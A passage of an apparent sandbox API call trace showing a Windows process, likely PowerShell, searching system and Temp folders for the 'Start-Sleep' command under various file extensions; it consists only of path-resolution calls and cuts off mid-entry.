GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.441] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.WSF", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.442] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.442] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.443] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.WSH", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x28 [0176.444] GetFullPathNameW (in: lpFileName="Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x34 [0176.444] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.444] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.445] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.MSC", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.445] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0176.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x28 [0176.446] GetFullPathNameW (in: lpFileName="Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x34 [0176.446] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.446] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.447] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.CPL", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.447] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0176.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep", lpFilePart=0x0) returned 0x24 [0176.447] GetFullPathNameW (in: lpFileName="Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpFilePart=0x0) returned 0x30 [0176.447] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.448] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.449] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.449] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x3a [0176.449] GetFullPathNameW (in: lpFileName="Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x34 [0176.449] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.450] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.451] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.ps1", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.451] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.451] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.451] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.451] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.451] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.451] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x3b [0176.451] GetFullPathNameW (in: lpFileName="Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x35 [0176.451] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.452] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.452] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.psm1", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.453] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.453] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.453] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x3b [0176.453] GetFullPathNameW (in: lpFileName="Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x35 [0176.453] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.453] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.454] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.psd1", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.455] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.COM", lpFilePart=0x0) returned 0x3a [0176.455] GetFullPathNameW (in: lpFileName="Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpFilePart=0x0) returned 0x34 [0176.455] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.455] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.456] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.COM", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.456] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.EXE", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.EXE", lpFilePart=0x0) returned 0x3a [0176.457] GetFullPathNameW (in: lpFileName="Start-Sleep.EXE", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpFilePart=0x0) returned 0x34 [0176.457] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.457] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.458] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.EXE", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.458] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.459] SetThreadErrorMode 